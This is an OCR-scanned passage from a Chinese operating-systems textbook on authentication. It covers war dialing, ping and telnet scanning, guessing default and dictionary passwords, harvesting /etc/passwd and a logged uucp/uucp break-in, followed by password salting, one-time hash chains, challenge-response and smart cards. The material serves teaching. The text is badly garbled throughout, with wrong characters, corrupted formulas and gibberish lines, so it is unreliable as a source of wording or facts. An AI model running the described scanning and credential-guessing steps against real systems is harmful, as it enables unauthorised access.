如 果 口 令 很 容易 被 猜 出 ， 真 的 会 有 什么 影响 吗 ? 当然 有 。1998 年 ， 
《圣何塞 信使 新 闻 》 报 告 说， 一 位 在 Berkeley 的 居民 Peter Shipley， 组 装 
了 好 几 台 未 被 使 用 的 计算 机 作为 军用 拨号 器 (war dialer) ， 拨 打 了 某 一 

个 分 局 内 的 10 000 个 电话 号 码 [如 (415) 770-xxxx]。 这 些 号 码 是 被 随机 
拨 出 的 ， 以 防 电话 公司 禁用 措施 和 跟踪 检测 。 在 拨打 了 大 约 260 万 个 电 
话 后 ， 他 定位 了 旧金山 湾 区 的 20 000 台 计算 机 ， 其 中 约 200 台 没有 任何 
安全 防范 。 他 估计 一 个 别有用心 的 骇 客 可 以 破译 其 他 75% 的 计算 机 系统 
(Denning, 1999) 。 这 就 回 到 了 侏 罗 纪 时 代 ， 计 算 机 实际 只 需 拨 打 所 
有 260 万 个 电话 号 码 。 凯 


并 不 只 有 加 利 福 尼 亚 州 才 有 这 样 的 骇 客 ， 一 个 澳大利亚 骇 客 曾 经 做 


过 同样 的 尝试 。 在 这 个 骇 客 问 入 的 系统 中 有 在 沙特 阿拉 伯 的 花旗 银行 的 
计算 机 ， 使 他 能 够 获得 信用 卡号 码 、 信 用 额度 (如 500 万 美元 ) 和 交易 
记录 。 他 的 一 个 同伴 也 曾 交 入 过 银行 计算 机 系统 ， 咨 取 了 4000 个 信用 卡 
写 (Denning，1999) 。 如 果 滥 用 这 样 的 信息 ， 银 行 训 无 疑问 会 极力 否 
认 自 己 有 错 ， 而 声称 一 定 是 客户 泄露 了 信息 。 





互联 网 是 上 帝 赐 给 骇 客 的 最 好 的 礼物 ， 它 帮助 骇 客 扫 清 了 入 侵 计 算 
机 过 程 中 的 绝 大 多 数 麻烦 ， 不 需要 拨打 更 多 的 电话 号 码 ， 军 用 拨号 器 可 
以 按 下 面 的 方式 工作 。 每 一 台 联 入 互联 网 的 计算 机 都 有 一 个 〈32 位 的 ) 
IP 地 址 CIP Address) 。 人 们 通常 把 这 些 地 址 写成 十 进 制 点 符号 ， 如 
WwW.X.y.z， 每 一 个 字母 代表 从 0 到 255 的 十 进 制 IP 地 址 。 骇 客 可 以 非常 容易 
地 测试 拥有 这 类 IP 地 址 的 计算 机 ， 并 通过 向 shell 或 控制 台中 输入 命令 





ping w.x.y.z 





来 判断 该 计算 机 是 否 在 网 上 。 如 果 计 算 机 在 网 上 ， 它 将 发 出 回复 信 
恩 并 告知 走 一 个 来 回 需 要 多 少 蝇 秒 (虽然 条 些 网 站 屏蔽 了 ping 命 令 以 防 
攻击 ) 。 墨 客 很 容易 写 一 个 程序 来 自动 发 射 大 量 的 卫 地 址 ， 当 然 也 可 以 
证 军用 拨号 器 来 做 。 如 果 某 台 计 算 机 被 发 现在 网 上 的 了 PP 地址 为 w.x.y.z， 
骇 客 就 可 以 通过 输入 











telnet w.x.y.z 


尝试 进入 系统 。 





如 果 联 机 尝试 被 允许 (也 可 能 被 拒绝 ， 因 为 不 是 所 有 的 系统 管理 员 
欢迎 通过 Internet 来 登录 〉)， 骇 客 就 能 够 开始 从 他 的 名 蛙 中 竺 试 登录 名 和 
口令 。 起 初 可 能 会 失败 ， 但 随 着 几 次 尝试 后 ， 骇 客 最 后 总 是 能 进入 系统 
并 获取 口令 文件 (通常 位 于 UNIX 系 统 的 /etc/passwd 下 ， 而 且 对 公众 是 可 
读 的 ) 。 然 后 ， 他 开始 收集 关于 登录 名 使 用 频率 等 统计 信息 来 优化 进 一 
步 的 搜索 。 








许多 telnet (远程 登录 ) 后 台 程 序 在 骇 客 尝试 了 许多 不 成 功 的 登录 
后 会 暂停 潜在 的 TCP 连 接 ， 以 降低 骇 客 的 连接 速度 。 骇 客 这 时 会 同时 局 
动 右 干 个 并 行 线程 ， 一 次 攻击 不 同 的 目标 。 他 们 的 目标 是 在 一 秒 中 内 进 
行 尽 可 能 多 的 尝试 ， 利 用 尽 可 能 多 的 带 冤 。 从 他 们 的 观点 来 说 ， 同 时 攻 
击 好 几 合计 算 机 并 不 是 一 个 严重 的 缺陷 。 














除了 依次 ping 计 算 机 的 耳 地 址 外 ， 通 客 还 可 以 攻击 公司 、 大 学 或 其 
他 政府 性 组 织 等 目标 ， 如 地 址 为 foobar.edu 的 Foobar 大 学 。 骇 客 通过 输入 





dnsquery foobar.edu 








就 可 以 查 到 该 大 学 的 一 长 串 IP 地 址 ， 也 可 以 使 用 nslookup 或 者 dig 程 
序 ( 还 可 以 通过 向 机 器 中 键入 “DNS gquery” 来 从 网 络 中 查找 可 以 进行 免 
费 DNS 查 询 的 网 站 ， 例 如 www.dnsstuff.com) 。 因 为 许多 机 构 都 拥有 65 


536 个 连续 的 耳 地 址 〈 过 去 常用 的 一 整个 分 配 单 元 ) ， 所 以 骇 客 一 旦 得 
到 也 地址 的 前 2 个 字 节 〈dnsquery 命 令 的 结果 ) ， 束 可 以 连续 地 使 用 ping 
命令 来 看 一 看 哪些 地 址 有 回应 ， 并 且 可 以 接受 telnet 连 接 。 完 成 这 一 步 
后 ， 通 客 就 可 以 通过 我 们 前 面 所 介绍 的 狂 用 户 名 和 口令 的 方法 闽 入 系 
统 。 


毫 无 疑问 ， 从 解析 主机 名 称 找到 IP 地 址 的 前 2 个 字 节 ， 到 ping 所 有 的 
地 址 看 哪些 有 反应 ， 再 看 这 些 地 址 是 否 文 持 telnet 连 接 ， 到 最 后 大 量 地 
进行 诸如 《登录 名 和 口令 ) 对 一 类 的 猜测 ， 这 些 过 程 都 可 以 很 好 地 目 动 
完成 。 这 一 过 程 会 进行 大 量 的 尝试 ， 以 便 闻 入， 而 且 如 果 骇 客 的 计算 机 
能 稳定 的 话 ， 可 以 不 断 地 重复 运行 茶 些 命令 直到 进入 系统 。 一 个 拥有 
局 速 电 统 或 DSL 连 接 的 骇 客 可 以 一 整 天 让 计算 机 自动 尝试 进入 条 个 系 
统 ， 而 他 所 做 的 只 是 偶尔 看 一 下 是 否 有 反馈 信息 。 








ne 











除了 远程 登录 服务 (telnet service) 以 外 ， 很 多 计算 机 还 提供 了 很 
多 其 他 可 以 应 用 于 互联 网 的 服务 。 每 个 服务 都 与 65 536 个 端口 〈port) 
中 的 一 个 相关 联 Cattach ， 当 骇 客 找到 了 一 个 活动 的 耳 地 址 ， 通 钊 情 
况 下 他 会 执行 端口 扫描 (port scan) 来 确定 每 个 端口 允许 哪些 服务 。 某 
些 剖 口 可 能 会 提供 额外 的 服务 ， 而 骇 客 则 可 能 利用 这 些 服 务 侵入 系统 。 





使 用 telnet 攻 击 或 端口 扫描 很 明显 比 军用 拨号 器 要 快 (无 须 拨 号 时 
间 ) ， 而 且 成 本 低 〈 无 须 长 途 电 话费 ) 。 但 它 仪 适用 于 攻击 Internet 上 的 
计算 机 和 telnet 连 接 。 而 的 确 有 许多 公司 (包括 几乎 所 有 的 大 学 〉 都 接 








受 telnet 连 接 ， 以 保证 雇员 在 出 差 时 或 在 不 同 的 办 公 室 〈 或 在 家 里 的 学 
生 ) 进行 远程 登录 。 


不 仅 用 户口 令 如 此 脆弱 ， 而 且 超 级 用 户口 令 有 时 也 十 分 脆弱 。 特 别 
是 有 些 刚刚 安装 好 的 服务 器 从 不 更 改 出 广 时 的 默认 口令 。 一 位 Berkeley 
大 学 的 天 文学 家 Cliff Stoll 曾经 观测 到 自己 计算 机 系统 的 不 正常 ， 于 是 他 
放置 了 一 个 陷阱 程序 来 捕捉 入 侵 者 〈Stoll，1989) 。 他 观察 到 了 一 个 如 
图 9-18 的 入 侵 过 程 一 一 某 个 骇 客 奖 入 了 Lawrence Berkeley 实 验 室 
(LBL) 并 想 进 入 下 一 个 目标 。 用 于 网 上 交换 的 uucp (UNIX 到 UNIX 的 
COPY 程 序 ) 账 号 拥有 超级 用 户 的 权力 ， 这 样 骇 客 可 以 闻 入 系统 成 为 美 
国 能 源 部 计算 机 的 超级 用 户 。 幸 运 的 是 ，LBL 并 不 是 设计 核武 器 的 实验 
室 ， 而 它 在 Livermore 的 姐妹 实验 室 却 的 确 是 设计 核武 器 的 。 人 们 希望 
自己 的 计算 机 系统 更 加 安全 ， 但 当 另 一 家 设计 核武 器 的 实验 室 Los 
Alamos 丢 失 了 一 个 装 有 2000 年 机 密 信 息 的 硬盘 以 后 ， 大 家 就 没有 理由 相 
言 系统 是 安全 的 了 。 





LBL> telnet elxsi 

ELXSI AT LBL 

LOGIN: root 

PASSWORD: root 

INCORRECT PASSWORD, TRY AGAIN 
LOGIN: guest 


PASSWORD: guest 

INCORRECT PASSWORD, TRY AGAIN 

LOGIN: uucp 

PASSWORD: uucp 

WELCOME TO THE ELXSI COMPUTER AT LBL 





图 9-18 骇 客 是 如 何 进 入 美国 能 源 部 位 于 LBL 实 验 室 的 计算 机 的 


一 旦 骇 客 问 入 了 系统 并 成 为 超级 用 户 ， 他 残 可 能 安装 一 个 叫做 包 探 
测 器 (packet sniffer) 的 软件 ， 该 软件 可 以 检查 所 有 在 网 上 进出 的 特定 
信息 包 。 其 中 之 一 是 查看 哪些 人 从 该 系统 上 远程 登录 到 别 的 计算 机 上 ， 
特别 是 作为 超级 用 户 登录 。 这 些 信息 可 以 被 骇 客 隐 藏 在 茶 一 文件 下 以 便 
闲暇 之 余 来 取 。 通 过 这 个 办 法 ， 骇 客 可 以 从 进入 一 个 安全 级 别 较 低 的 计 
算 机 入 手 ， 不 断 地 阁 入 更 强 安 全 性 能 的 系统 里 。 





目前 越 来 越 多 的 非法 入 侵 都 是 一 些 技术 上 的 生 手 造成 的 ， 他 们 不 过 
是 运行 了 一 些 在 Internet 上 找到 的 脚本 程序 。 这 些 脚本 要 么 使 用 我 们 上 面 
介绍 的 极端 攻击 ， 要 么 试图 找到 特定 程序 的 bug。 真 正 的 骇 客 认为 他 们 
只 是 些 脚 本 爱好 者 (script kiddy) 。 








通常 脚本 爱好 者 没有 特定 的 攻击 目标 也 没有 特别 想 偷 鳃 的 信息 。 他 


们 不 过 是 想 看 看 哪些 系统 较 容 易 冰 入 罢了 。 有 些 脚本 爱好 者 随便 找 一 个 
网 络 攻击 ， 有 些 干脆 随机 选取 网 络 地 址 (IP 地址 的 高 位 看 看 哪些 有 反 
应 。 一 旦 获得 了 一 个 有 效 卫 地址 的 数据 库 ， 束 可 以 依次 对 计算 机 进行 攻 
击 了 。 结 果 是 ， 一 人 台 全 新 的 、 有 安全 保卫 的 车 方 计算 机 ， 刚 联网 数 小 时 
后 就 受到 了 来 目 Internet 的 攻击 ， 甚 至 除了 系统 管理 员外 还 没有 多 少 人 知 
BEX A HLA o 





2.UNIX 口 令 安全 性 


有 些 〈 老 式 的 ) 操作 系统 将 口令 文件 以 未 加 密 的 形式 存放 在 磁盘 
里 ， 由 一 般 的 系统 保护 机 制 进行 保 护 。 这 样 做 等 于 是 目 找 麻 烦 ， 因 为 许 
多 人 都 可 以 访问 该 文件 。 系 统管 理 员 、 操 作 员 、 维 护 人 员 、 程 序 员 、 管 
理 人 员 甚 至 有 些 秘书 都 可 以 轻而易举 得 到 。 


在 UNIX 系 统 里 有 一 个 较 好 的 做 法 。 当 用 户 登 录 时 ， 登 录 程 序 首 先 
询问 登录 名 和 口令 。 输 入 的 口令 被 即刻 “加 密 ”， 这 是 通过 将 其 作为 密 钥 
对 茶 段 数据 加 密 完 成 的 : 运行 一 个 有 效 的 单 癌 函数， 运行 时 将 口令 作为 
输入 ， 运 行 结果 作为 输出 。 这 一 过 程 并 不 是 真 的 加 密 ， 但 人 们 很 容易 把 
它 叫 做 加 密 。 然 后 登录 程序 读 入 加 蜜 文件 ， 也 惑 是 一 系列 ASCII 代 码 
行 ， 每 个 登录 用 户 一 行 ， 直 到 找 出 包含 登录 名 的 那 一 行 。 如 果 这 行内 
(被 加 密 后 的 ) 的 口令 与 刚刚 计算 出 来 的 输入 口令 匹配 ， 就 允许 登录 ， 
否则 就 拒绝 。 这 种 方法 的 最 大 好 处 是 任何 人 《甚至 是 超级 用 户 ) 都 无 法 
查看 任何 用 户 的 口令 ， 因 为 口令 文件 并 不 是 以 未 加 密 方式 在 系统 中 任意 








存放 的 。 


然而 ， 这 种 方法 也 可 能 但 到 攻击 。 骇 洛 可 以 首先 像 Morris 和 
Thompson 一 样 建 并 备 选 口 令 的 字典 并 在 空 暇 时 间 用 已 知 算法 加 密 。 

过 程 无 论 有 多 长 都 无 所 谓 ， 因 为 它们 是 在 进入 系统 前 事先 完成 的 。 现 
在 有 了 口令 对 (原始 口令 和 经 过 了 加 密 的 口令 ) MART Bo. 1% 
客 读 入 口令 文件 (可 公开 获取 〉 ， 抽 取 所 有 加 密 过 的 口令 ， 然 后 将 其 与 
口令 字典 里 的 字符 串 进 行 比较 。 每 成 功 一 次 就 获取 了 登录 名 和 未 加 密 过 
的 口令 。 一 个 简单 的 shell 脚 本 可 以 上 自动 运行 上 述 操 作 ， 这 样 整个 过 程 可 
以 在 不 到 一 秒 的 时 间 内 完成 。 这 样 的 脚本 一 次 运行 会 产生 数 十 个 口令 。 

















E 到 存在 这 种 攻击 的 可 能 性 ， 引 入 了 一 种 几乎 
使 攻击 毫 无 效果 的 技巧 。 这 一 技巧 是 将 每 一 个 口令 同一 个 叫 
做 “ 盐 ”(salt) 的 n 位 随机 数 相 关联 。 无 论 何 时 只 要 口令 改变 ， 随 机 数 就 
改变 。 随 机 数 以 未 加 密 的 方式 存放 在 口令 文件 中 ， 这 样 每 个 人 都 可 以 
读 。 不 再 只 保存 加 密 过 的 口令 ， 而 是 先 将 口令 和 随机 数 连接 起 来 然后 一 
同 加 密 。 加 密 后 的 结果 存放 进口 令 文件 。 如 图 9-19 所 示 ， 一 个 口令 文件 
里 有 5 个 用 户 : Bobbie、Tony、Laura、Mark 和 Deborah。 每 一 个 用 户 在 
文件 里 分 别 占 一 行 ， 用 逗号 分 解 为 3 个 条 目 : 登录 名 、 盐 和 《口令 + 盐 ) 
的 加 密 结果 。 符 号 e。 (Dog, 4238) 表示 将 Bobbie 的 口令 Dog 同 他 的 随 
机 ，4238 通 过 加 密 函 数 e 运 算 后 的 结果 。 这 一 加 密 值 放 在 Bobbie 条 目的 
第 三 个 域 。 








Bobbie, 4238, e(Dog, 4238) _ 
Tony, 2918, e(6%%TaeFF, 2918) 


Laura, 6902, e(Shakespeare: 6902) 
Mark, 1694, e(XaB # Bwez , 1694 
Deborah, 1092, e(LordByron, 1092) 





图 9-19 通过 salt 的 使 用 抵抗 对 已 加 密 口 令 的 先期 运算 


现在 我 们 回顾 一 下 骇 客 非法 冯 入 计算 机 系统 的 整个 过 程 ; 首先 建立 
可 能 的 口令 字典 ， 把 它们 加 密 ， 然 后 存放 在 经 过 排序 的 文件 {中 ， 这 样 
任何 加 密 过 的 口令 都 能 够 被 轻易 找到 。 假 设 入 侵 者 怀疑 Dog 是 一 个 可 能 
的 口令 ， 把 Dog 加 密 后 放 进 文件 f 中 就 不 再 有 效 了 。 骇 客 不 得 不 加 密 2? 个 
字符 串 ， 如 Dog0000、Dog0001、Dog0002 等 ， 并 在 文件 f 中 输入 所 有 知 
道 的 字符 串 。 这 种 方法 增加 了 2 倍 的 f 的 计算 量 。 在 UNIX 系 统 中 的 该 方 
法 里 n=12。 








对 附加 的 安全 功能 来 说 ， 有 些 UNIX 的 现代 版 使 口令 不 可 读 但 却 提 
供 了 一 个 程序 可 以 根据 申请 查询 口令 条 目 ， 这 样 做 极 大 地 降低 了 任何 攻 
击 者 的 速度 。 对 口令 文件 采用 “加 盐 ? 的 方法 以 及 使 之 不 可 读 《〈 除 非 间接 
和 缓慢 地 读 ) ， 可 以 抵挡 大 多 数 的 外 部 攻击 。 





3. 一 次 性 口令 


很 多 省 理 员 劝解 他 们 的 用 户 一 个 月 换 一 次 口令 。 但 用 户 常 常 不 把 这 
些 忠告 放 在 心 上 。 更 换 口 令 更 极端 的 方式 是 每 次 登录 换 一 次 口令 ， 即 使 








用 一 次 性 口令 。 当 用 户 使 用 一 次 性 口令 时 ， 他 们 会 拿 出 含有 口令 列表 的 
KF. 用户 每 一 次 登录 都 需要 使 用 列表 里 的 后 一 个 口令 。 如 果 入 侵 者 万 
一 发 现 了 口令 ， 对 他 也 没有 任何 好 处 ， 因 为 下 一 次 登录 就 要 使 用 新 的 口 
令 。 惟 一 的 建议 是 用 户 必须 避免 丢失 口令 本 。 


实际 上 ， 使 用 Leslie Lamport 巧 妙 设 计 的 机 制 ， 就 不 再 需要 口令 本 
了 ， 该 机 制 让 用 户 在 并 不 安全 的 网 络 上 使 用 一 次 性 口令 安全 登录 
(Lamport,1981) 。Lamport 的 方法 也 可 以 让 用 户 通过 家 里 的 PC 登录 到 
Internet 服 务 器 ， 即 便 入 侵 者 可 以 看 到 并 且 复 制 下 所 有 进出 的 消息 。 而 
且 ， 这 种 方法 无 论 在 服务 器 和 还 是 用 户 PC 的 文件 系统 中 ， 都 不 需要 放 
置 任何 秘密 信息 。 这 种 方法 有 时 候 被 称 为 单 向 散 列 链 《〈one-way hash 


chain) 。 





上 述 方法 的 算法 基于 单 向 函数 ， 即 y=f(x)。 给 定 x 我 们 很 容易 计算 出 
y， 但 是 给 定 y 却 很 难 计算 出 x。 输 入 和 输入 必须 是 相同 的 长 度 ， 如 256 


位 。 





用 户 选 取 一 个 他 可 以 记 住 的 保密 口令 。 该 用 户 还 要 选择 一 个 整数 
n， 该 整数 确定 了 算法 所 能 够 生成 的 一 次 性 口令 的 数量 。 如 果 ， 考 虑 
n=4， 当 然 实际 上 所 使 用 的 n 值 要 大 得 多 。 如 果 保 密 口 令 为 s， 那 么 通过 
单 问 函数 计算 n 次 得 到 的 口令 为 : 


Pi1 =f(f(f(f(s)))) 


第 2 个 口令 用 单 同 函数 运算 n-1 次 : 


P2 =f(F(E(s))) 





第 3 个 口令 对 {f 运 算 2 次 ， 第 4 个 运算 1 次 。 总 之 ，Pi 1 =f(P; )。 要 注意 
的 地 方 是 ， 给 定 任何 序列 里 的 口令 ， 我 们 很 容易 计算 出 口令 序列 里 的 前 
一 个 值 ， 但 却 不 可 能 计算 出 后 一 个 值 。 如 ， 给 定 P, 很 容易 计算 出 Pi ， 
但 不 可 能 计算 出 P3 。 





口令 服务 器 首先 由 Po 进行 初始 化 ， 即 f(P1 )。 这 一 值 连同 登录 用 户 
名 和 整数 1 被 存放 在 口令 文件 的 相应 条 目 里 。 整 数 1 表 示 下 一 个 所 需 的 口 
令 是 P; 。 当 用 户 第 一 次 登录 时 ， 他 首先 把 自己 的 登录 名 发 送 到 服务 器 ， 
服务 器 回复 口令 文件 里 的 整数 值 1。 用 户 机 器 在 本 地 对 所 输入 的 s 进 行 运 
算得 到 P; 。 随 后 服务 此 根据 Pj 计算 出 f(P1 )， 并 将 结果 同 口令 文件 里 的 
(Po ) 进 行 比较 。 如 果 符 合 ， 登 录 被 允许 。 这 时 ， 整 数 被 增加 到 2， 在 口 
令 文 件 中 P; 覆盖 了 Pu o 




















下 一 次 登录 时 ， 服 务 器 把 整数 2 发 送 到 用 户 计算 机 ， 用 户 机 器 计算 
HP 。 然 后 服务 器 计算 fCP; ) 的 值 并 将 其 与 口令 文件 中 存放 的 值 进行 比 
较 。 如 果 两 者 匹配 ， 就 允许 登录 。 这 时 整数 n 被 增加 到 3， 口 令 文件 中 由 
Po iP, 。 这 一 机 制 的 特性 保证 了 即使 入 侵 者 可 以 欠 取 P; 也 无 法 从 Pi 
计算 出 Pi ， 而 只 能 计算 出 Pi; ， 但 Pi 已 经 使 用 过 ， 现 在 失效 了 。 当 所 
有 n 个 口令 部 被 用 完 时 ， 服 务 器 会 重新 初始 化 一 个 密 钥 。 














4. 挑 战 - 啊 应 认证 


为 一 种 口令 机 制 是 让 每 一 个 用 户 提 供 一 长 串 问 题 并 把 它们 安全 地 放 
在 服务 器 中 《如 可 以 用 加 密 形 式 ) 。 问 题 是 用 户 自选 的 并 且 不 用 写 在 纸 
上 。 下 面 是 用 户 可 能 选择 的 问题 : 





1) 谁 是 Marjolein 的 姐妹 ? 
2) 你 的 小 学 在 哪 一 条 路 上 ? 
3)Woroboff 女 士 教 什 么 课 ? 


在 登录 时 ， 服 务 器 随机 提问 并 验证 答案 。 要 使 这 种 方法 有 效 ， 就 要 


提供 尽 可 能 多 的 问题 和 答案 。 





另 一 种 方法 叫做 挑战 - 啊 应 。 使 用 这 种 方法 时 ， 在 登录 为 用 户 时 用 
户 选择 某 一 种 运算 ， 例 如 x“ 。 当 用 户 登 录 时 ， 服 务 器 发 送 给 用 户 一 个 参 
数 ， 假 设 是 7， 在 这 种 情形 下 ， 用 户 就 输入 49。 这 种 运算 方法 可 以 每 
周 、 每 天 后 者 从 早 到 晚 经 常 变 化 。 





如 果 用 户 的 终端 设备 具有 十 分 强大 的 运算 能 力 ， 如 个 人 计算 机 、 个 
人 数字 助理 或 手机 ， 那 么 就 可 以 使 用 更 强大 的 挑战 啊 应 方法 。 过 程 如 
下 : 用 户 事 先 选 择 密 钥 k， 并 手工 放置 到 服务 器 中 。 密 钥 的 备份 也 被 安 
全 地 存放 在 用 户 的 计算 机 里 。 在 登录 时 ， 服 务 右 把 随机 产生 的 数 r 及 送 
到 用 户 端 ， 由 用 户 站 计算 出 f(r,k) 的 值 。 其 中 ，f 是 一 个 公开 已 知 的 函 


数 。 然 后 ， 服 务 器 也 做 同样 的 运算 看 看 结果 是 人 否 一 致 。 这 种 方法 的 优 点 
古 即 使 盘 听 者 看 到 并 记录 下 双方 通信 的 信息 ， 也 对 他 至 无 用 处 。 当 然 ， 

函数 f 需 要 足够 复 淋 ， 以 保证 k 不 能 被 逆 推 。 加 密 散 列 函 数 是 不 错 的 选 

择 ，r 与 k 的 异 或 值 CXOR) 作为 该 函数 的 一 个 参数 。 运 今 为 止 ， 这样 的 
函数 仍然 被 认为 是 难以 他 推 的 。 











[1] 在 获得 奥斯卡 奖 的 科幻 电影 《 侏 罗 纪 公园 荡 中 ， 一 位 名 叫 Dennis 
Nedry 的 计算 机 系统 总 设计 师 上 暗地里 将 由 计算 机 控制 的 保安 系统 全 部 关 
闭 并 逃离 了 主 控 室 ， 以 便 窃取 并 带 走 称 龙 的 DNA。 另 一 位 计算 机 技术 
人 员 面 对 混乱 的 系统 ， 对 现场 的 其 他 人 说 ， 由 于 没有 保存 任何 信息 ， 所 
以 要 想 恢 复 保安 系统 ， 只 有 一 个 一 个 地 测试 ， 才 能 在 总 共 200 万 个 号 码 
中 将 需要 的 号 码 找 出 来 ， 一 听 是 200 万 个 号 码 ， 在 场 的 人 都 泄 了 气 。 作 
者 在 这 里 调 侦 了 电影 《 侏 罗 纪 公 园 荡 的 创作 者 们 ， 了 既然 现场 计算 机 系 
统 还 能 工作 ， 为 什么 不 让 计算 机 去 拨打 这 些 号 码 呢 ! ? 译 者 注 





9.4.2 ”使 用 实际 物体 的 认证 方式 


用 户 认 证 的 第 二 种 方式 验证 一 些 用 户 所 拥有 的 实际 物体 而 不 是 用 户 
所 知道 的 信息 。 如 金属 钥匙 束 被 使 用 了 好 几 个 世纪 。 现 在 ， 人 们 经 闻 使 
用 磁卡 ， 并 把 它 放 入 与 终端 或 计算 机 相连 的 读 卡 磊 中。 而 且 一 般 情 况 
下 ， 用 户 不 仅 要 择 卡 ， 还 要 输入 口令 以 保护 别人 冒 用 遗失 或 偷 来 的 磁 
卡 。 银 行 的 ATM 机 “自动 取款 机 ) 就 采用 这 种 方法 让 客户 使 用 磁卡 和 
OSH 〈 现 在 大 多 数 国家 用 4 位 的 PIN 代码 ， 这 主要 是 为 了 减少 ATM 机 
安装 计算 机 键盘 的 费用 ) 通过 远程 终端 (ATM 机 ) 登录 到 银行 的 主机 
Ree 





载 有 信息 的 磁卡 有 两 种 : 磁 条 卡 和 尾 片 卡 。 磁 条 卡 后 面 粘 附 的 磁 条 
上 可 以 写 入 存放 140 个 字 节 的 信息 。 这 些 信息 可 以 被 终端 读 出 并 发 送 到 
主机 。 一 般 这 些 信息 包括 用 户口 令 〈 如 PIN 代码 ) 这 样 终端 即便 在 与 银 
行 主 机 通信 断 开 的 情况 下 也 可 以 校 验 。 通 常 ， 用 只 有 银行 已 知 的 密 钥 对 
口令 进行 加 密 。 这 些 卡 片 每 张 成 本 大 约 在 0.1 美 元 到 0.5 美 元 之 间 ， 价 格 
ARERR FA Be ARE E. FEAT, R 
卡 有 一 定 的 风险 。 因 为 读 写 卡 的 设备 比较 便宜 并 被 大 量 使 用 着 。 





而 忆 片 卡 在 卡片 上 包含 了 小 型 集成 电路 。 这 种 卡 又 可 以 被 进一步 分 
为 两 类 : fe RARER. MERAS SERENA oo GHZ) 





于 1KB〉， 它 使 用 ROM 技 术 保 证 数据 在 断 电 和 离开 读 写 设备 后 也 能 够 保 
持 记 忆 。 不 过 在 卡片 上 没有 CPU， 所 以 被 存储 的 信息 只 有 外 部 的 

CPU GX Bas) 才能 改变 。 储 值 卡 被 大 量 生 产 ， 使 得 每 张 成 本 可 以 低 
于 1 美元 ， 如 电话 预付 费 卡 等 。 当 人 们 打 电 话 时 ， 卡 里 的 电话 费 被 扣 
除 ， 但 实际 上 并 没有 发 生 资 金 的 转移 。 由 于 这 个 原因 ， 这 类 卡 仅仅 由 一 
家 公司 发 售 并 只 能 用 于 一 种 读 卡 器 (如 电话 机 或 自动 售 货 机 )〉 。 当 然 也 
可 以 存储 1KB 信 息 的 密码 并 通过 读 卡 机 发 送 到 主机 验证 ， 但 很 少 有 人 这 
么 做 。 


近来 拥有 更 安全 特性 的 是 智能 卡 。 智 能 卡通 常 使 用 4MHz 8 位 
CPU,16KB ROM,4 KB ROM，512B 可 擦 写 RAM 以 及 9600b/s 与 读 卡 器 之 
间 的 通信 速率 。 这 类 卡 制作 越 来 越 小 巧 ， 但 各 种 参数 却 不 尽 相 同 。 这 些 
BRATS AIRE CALAHK ATER AHL). CRER CSAP Sot Rit 
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智能 卡 可 用 来 像 储 值 卡 一 样 储 值 ， 但 却 具有 更 好 的 安全 性 和 更 广泛 
的 用 途 。 用 户 可 以 在 ATM 机 上 或 通过 银行 提供 的 特殊 读 卡 器 连接 到 主 
机 取 钱 。 用 户 在 商家 把 卡 插 入 读 卡 器 后 ， 可 以 授权 卡片 进行 一 定数 量 金 
额 的 转账 “输入 YES 后 ) 。 卡 片 将 一 段 加 密 过 的 信息 发 送 到 商家 ， 商 家 
稍 后 将 信息 流转 到 银行 扣除 所 付 金 额 的 信用 。 











与 信用 卡 或 借 记 卡 相 比 ， 智 能 卡 的 最 大 优点 是 无 须 直 接 与 银行 联机 


操作 。 如 果 读 者 不 相信 这 个 优点 ， 可 以 尝试 下 面 的 实验 。 在 商店 里 买 一 
块 糖果 并 坚持 用 信用 卡 结账 。 如 宁 商 家 反对 ， 你 就 说 身边 没有 现金 而 且 
你 希望 增加 飞行 里 数 癌 。 你 将 发 现 商家 对 你 的 想法 毫 无 热情 〈 因 为 使 
用 信用 卡 的 相关 成 本 会 使 获得 的 利润 相形 见 细 ) 。 所 以 ， 在 商店 为 少量 
商品 付 蒜 、 付 电话 费 、 集 车 绩 、 使 用 目 动 售 贷 机 以 及 其 他 许多 需要 使 用 
硬币 的 场合 下 ， 短 能 卡 是 十 分 有 用 的 。 在 欧洲 ， 智 能 卡 被 广泛 使 用 并 逐 
渐 推 广 到 其 他 地 区 。 














智能 卡 有 许多 其 他 的 潜在 用 途 例 如 ， 将 持 卡 人 的 过 敏 反应 以 及 其 
他 医疗 状况 以 安全 的 方式 编码 ， 供 紧急 时 使 用 ) ， 但 本 书 并 不 是 讲 故事 
的 ， 我 们 的 兴趣 在 于 智能 卡 如 何 用 于 安全 登录 认证 。 其 基本 概念 很 简 
单 : 智能 卡 非 第 小 ， 卡 片上 有 可 携带 的 微型 计算 机 与 主机 进行 交谈 称 
作协 议 ) 并 验证 用 户 映 份 。 如 用 户 想 要 在 电子 商务 网 站 上 买 东 西 时 ， 可 
以 把 智能 卡 插 入 家 里 与 PC 相连 的 读 卡 右 。 电 子 了 商务 网 站 不 仅 可 以 比 用 
口令 更 安全 地 通过 智能 卡 验证 用 户 身 份 ， 还 可 以 在 卡 上 直接 扣除 购买 商 
品 的 金额 ， 减 少 了 网 站 为 用 户 能 够 使 用 联机 信用 卡 进 行 消费 而 付出 的 大 
量 成 本 《以 及 风险 ) 。 


智能 卡 可 以 使 用 不 同 的 验证 机 制 。 一 个 简单 的 挑 成 - 啊 应 的 例子 是 
REI: 首先 服务 器 向 智能 卡 发 出 512 位 随机 数 ， 智 能 卡 接着 将 随机 数 
加 上 存储 在 卡 上 EEPROM 中 的 512 位 用 户口 令 。 然 后 对 所 得 的 和 进行 平 
方 运算 ， 并 且 把 中 间 的 512 位 数字 发 送 回 服务 器 ， 这 样 服务 器 就 知道 了 


用 户 的 口令 并 且 可 以 计算 出 该 结果 值 正 确 与 否 。 整 个 过 程 如 图 9-20 所 
示 。 如 果 禄 听 者 看 到 了 双方 的 信息 ， 他 也 无 从 采用 ， 即 便 记 录 下 来 今后 
也 没有 用 处 ， 因 为 下 一 次 登录 时 ， 服 务 志 会 发 出 另 一 个 512 位 的 随机 
数 。 当 然 ， 我 们 可 以 使 用 更 加 新 的 算法 而 不 是 简单 的 平方 运算 。 


远程 计算 机 











i; 把 挑战 发 送 给 智能 卡 










3. 回 送 啊 应 





智能 卡 读 卡 机 


图 9-20 使 用 智能 卡 的 认证 


任何 固定 的 密码 通信 协议 的 缺点 古 容易 在 传输 过 程 中 损坏 ， 从 而 使 
智能 卡 丧 失 功 能 。 避 免 这 种 情况 的 一 个 办 法 是 在 卡片 里 使 用 ROM 而 不 
古 密 码 通信 协议 ， 如 Java 解 释 程 序 。 然 后 将 用 Java 二 进 制 语言 写成 的 通 
